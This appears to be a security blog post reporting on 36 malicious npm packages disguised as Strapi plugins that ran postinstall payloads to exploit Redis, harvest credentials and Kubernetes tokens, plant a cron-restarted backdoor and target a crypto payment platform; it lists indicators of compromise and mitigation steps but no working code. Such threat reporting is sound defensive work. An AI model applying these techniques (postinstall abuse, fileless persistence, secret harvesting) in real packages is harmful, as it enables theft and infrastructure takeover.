Posted in

36 Malicious npm Strapi Packages Used in Targeted Supply Chain Attack 

by Rakesh0

A sophisticated software supply chain attack has been discovered targeting developers using Strapi. Attackers published 36 malicious packages to the npm registry disguised as legitimate Strapi plugins.

These packages executed automatically during installation, exploiting Redis for remote code execution, stealing credentials, and deploying persistent command-and-control malware.

The campaign appears highly targeted, focusing on a cryptocurrency payment platform and attempting to extract sensitive financial infrastructure data.

How the Malicious npm Packages Worked 

The threat actor created fake packages mimicking real Strapi plugins. Once a developer ran:

npm install

A malicious postinstall script executed automatically, requiring no further action.

Key characteristics:

  • Identical file structure across packages
  • Fake version number 3.6.8
  • Plugin-style naming to appear legitimate
  • Automatic execution during installation

Examples of malicious package names included:

  • strapi-plugin-cron
  • strapi-plugin-events
  • strapi-plugin-seed

Multiple Fake Publisher Accounts 

The malicious packages were distributed through four npm accounts believed to be controlled by one attacker:

  • umarbek1233
  • kekylf12
  • tikeqemif26
  • umar_bektembiev1

This tactic helped evade detection and increase credibility.

Redis RCE and Credential Harvesting 

Early payloads focused on:

  • Redis remote code execution
  • Docker container escape
  • Filesystem secret scanning
  • Environment variable harvesting

Later variants expanded capabilities to:

  • PostgreSQL database access
  • Kubernetes token theft
  • Private key exfiltration
  • API credential harvesting

All stolen data was transmitted in plaintext HTTP to attacker-controlled infrastructure.

Targeted Cryptocurrency Platform 

Researchers discovered references to a crypto payment gateway called Guardarian embedded across payloads.

The malicious code searched for:

  • guardarian
  • guardarian_payments
  • exchange
  • custody

This confirms the attack was not opportunistic but specifically designed for financial theft.

Persistent Command-and-Control Implant Later payloads deployed a hidden backdoor:

  • File created: /tmp/.node_gc.js
  • Background execution via detached process
  • Cron job restarting every minute
  • Persistent remote access

This transformed a simple package installation into a long-term compromise.

Fileless Malware Variant

The most advanced payload removed disk artifacts entirely:

  • Inline execution using node -e
  • No filesystem traces
  • Memory-only execution
  • Harder detection by security tools

This technique significantly increases stealth.

Infrastructure Reconnaissance

One payload only activated when hostname matched:

prod-strapi

This indicates the attacker already knew the production environment name — suggesting prior reconnaissance.

The malware also targeted:

  • Jenkins pipeline paths
  • Kubernetes service tokens
  • Docker secrets
  • Environment configuration files

Indicators of Compromise

Security teams should check for:

  • Unknown Strapi plugin installations
  • /tmp/.node_gc.js file
  • /tmp/vps_shell.sh scripts
  • Suspicious cron jobs
  • Outbound connections to attacker IP
  • Unexpected Node background processes

Immediate Mitigation Steps 

Organizations using Strapi should:

1. Audit Installed npm Packages

Remove suspicious Strapi plugins immediately.

2. Rotate All Credentials

Reset:

  • Database passwords
  • API keys
  • JWT secrets
  • Private keys

3. Remove Persistent Backdoors

Delete:

  • /tmp/.node_gc.js
  • /tmp/vps_shell.sh
  • Unknown upload directory files

4. Check Cron Jobs

Remove entries referencing:

  • node_gc
  • curl
  • unknown scripts

5. Revoke Kubernetes Tokens

Invalidate exposed service account tokens immediately.

Potential Impact

Successful compromise could expose:

  • Cryptocurrency hot wallet credentials
  • Transaction databases
  • Payment processing systems
  • Infrastructure secrets
  • CI/CD pipelines

This could lead to financial theft and full infrastructure takeover.

Key Takeaways 💡

  • 36 malicious npm packages targeted Strapi developers
  • Automatic execution via postinstall script
  • Redis RCE and credential theft capabilities
  • Persistent command-and-control backdoor
  • Fileless malware variant deployed
  • Cryptocurrency platform specifically targeted
  • Immediate credential rotation required

Conclusion

This campaign highlights the growing risk of supply chain attacks targeting developers through trusted package ecosystems. Even widely used platforms like npm can be abused to distribute highly targeted malware.

Organizations using Strapi should immediately audit dependencies, rotate credentials, and monitor for persistence mechanisms to prevent long-term compromise.

Subscribe

Leave a Reply

Your email address will not be published. Required fields are marked *